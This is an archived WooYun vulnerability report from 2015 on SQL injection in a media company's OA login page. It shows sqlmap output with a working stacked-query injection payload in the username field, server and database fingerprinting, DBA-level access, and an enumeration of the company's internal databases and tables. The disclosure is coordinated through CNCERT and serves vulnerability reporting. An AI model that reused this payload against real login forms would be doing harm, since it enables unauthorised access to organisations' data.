当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156850

漏洞标题:中视传媒OA系统SQL注入(管理员权限)

相关厂商:中视传媒股份有限公司

漏洞作者: Ysql404

提交时间:2015-12-01 01:56

修复时间:2016-01-18 13:50

公开时间:2016-01-18 13:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

中视传媒OA系统SQL注入(管理员权限)

详细说明:

http://**.**.**.**/login.aspx

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txt_User
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJMjE0NzA3ODA0ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUJaWJuX0xvZ2luBQxpbmJfUmVzZXRQc2QIUg6GyBl+bZcmUPDgEOIdVyq2fA==&txt_User=admin%'; IF(2144=2144) SELECT 2144 ELSE DROP FUNCTION FHWU--&txt_Psd=admin&ibn_Login.x=39&ibn_Login.y=6&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBQLkk9TYAgL4hPDxAQLam7qxCQLT/qM6ApC4yO0FDfqx6JH5R0cBxEsE/YbdqPPxnsY=
---
[16:06:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current user is DBA: True
database management system users [2]:
[*] BUILTIN\\Administrators
[*] sa


available databases [9]:
[*] CTVOA
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] TEST
[*] TESTWJL


漏洞证明:

Database: CTVOA
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| dbo.approve_FlowMove | 14845 |
| dbo.Asset_Check | 9413 |
| dbo.approve_ApproveInfo | 7468 |
| dbo.WorkThing_WorkThingApprove | 7034 |
| dbo.WorkThing_MoveInfo | 6800 |
| dbo.WorkThing_Pay | 6128 |
| dbo.V_Bbs_QinInfo | 3888 |
| dbo.WorkThing_WorkThingInfo_handel | 1570 |
| dbo.ConferenceManage_AassemblyRoomUsed | 1497 |
| dbo.Asset_AssetInfo | 1013 |
| dbo.Mail_Content | 970 |
| dbo.Asset_AssetMove | 843 |
| dbo.WorkThing_WorkThingInfo | 836 |
| dbo.Mail_Attach | 676 |
| dbo.IndividualWork_WorkProject | 495 |
| dbo.JC_DataPurview | 393 |
| dbo.JC_RoleModule | 381 |
| dbo.InfoManage_Affiche | 308 |
| dbo.InfoManage_AfficheAcc | 307 |
| dbo.Info_ForeignNews | 287 |
| dbo.Mail_Association | 251 |
| dbo.Emp_Emp | 216 |
| dbo.BS_GroupRightRe | 213 |
| dbo.JC_MenuRight | 200 |
| dbo.messages | 199 |
| dbo.Hr_Employee | 187 |
| dbo.JC_UserRole | 186 |
| dbo.InfoManage_AfficheInfoSee | 180 |
| dbo.BS_UserInfo | 158 |
| dbo.JC_Menu | 131 |
| dbo.Emp_EmpPhoto | 129 |
| dbo.bi_ValueList | 128 |
| dbo.approve_ApproveFlowRoles | 124 |
| dbo.JC_User | 124 |
| dbo.IndividualWork_Calendar | 111 |
| dbo.sysconstraints | 94 |
| dbo.in_Emp | 92 |
| dbo.ConferenceManage_Confirm | 90 |
| dbo.Mail_AssociationGroup | 85 |
| dbo.BS_UserGroupRe | 83 |
| dbo.JC_Module | 78 |
| dbo.ArchivesMove_Archives | 63 |
| dbo.Res_ResAcc | 63 |
| dbo.Res_ResStore | 63 |
| dbo.Mail_Group | 59 |
| dbo.BS_GroupInfo | 50 |
| dbo.IndividualWork_BusinessCard | 47 |
| dbo.approve_ApproveFlowSetup | 40 |
| dbo.Doc_Type | 40 |
| dbo.JC_Role | 39 |
| dbo.Service_TicketBooking | 39 |
| dbo.Service_BusinessCardPrint | 38 |
| dbo.Service_HotelBooking | 37 |
| dbo.Emp_DeptChange | 32 |
| dbo.ArchivesMove_ArchivesHeaderImage | 31 |
| dbo.JC_Accredit1 | 26 |
| dbo.BS_RightInfo | 24 |
| dbo.ConferenceManage_ConferenceApply | 24 |
| dbo.Org_Organization | 23 |
| dbo.JC_Item_UserRole | 19 |
| dbo.Doc_Doc | 18 |
| dbo.Emp_Dept | 18 |
| dbo.Service_BusinessCardPrint_Detail | 14 |
| dbo.in_dept | 13 |
| dbo.InfoManage_ItemMgr | 13 |
| dbo.Car_Info | 10 |
| dbo.ConferenceManage_AassemblyRoomInfo | 10 |
| dbo.Doc_AnotherDeptQueryApprove | 9 |
| dbo.Archives_Office | 8 |
| dbo.JC_SequenceTab | 8 |
| dbo.BS_RightMenuRe | 7 |
| dbo.InfoManage_InfoRelease | 7 |
| dbo.ArchivesMove_ArchivesAcc | 5 |
| dbo.BS_UpperGroupInfo | 5 |
| dbo.Mail_Folder | 4 |
| dbo.Doc_Doc_AnotherDeptQueryInfo | 3 |
| dbo.Mail_Priority | 3 |
| dbo.Res_ResType | 3 |
| dbo.syssegments | 3 |
| dbo.Asset_Servicing | 2 |
| dbo.Car_Used | 2 |
| dbo.Doc_DocAcc | 2 |
| dbo.InfoManage_BriefingCollect | 2 |
| dbo.Org_DepUser | 2 |
| dbo.ConferenceManage_ConferenceAcc | 1 |
| dbo.ConferenceManage_summary | 1 |
| dbo.InfoManage_BriefingDistill | 1 |
| dbo.Mail_Environ | 1 |
+----------------------------------------+---------+


不再继续。。

修复方案:

过滤

版权声明:转载请注明来源 Ysql404@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-12-04 13:40

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价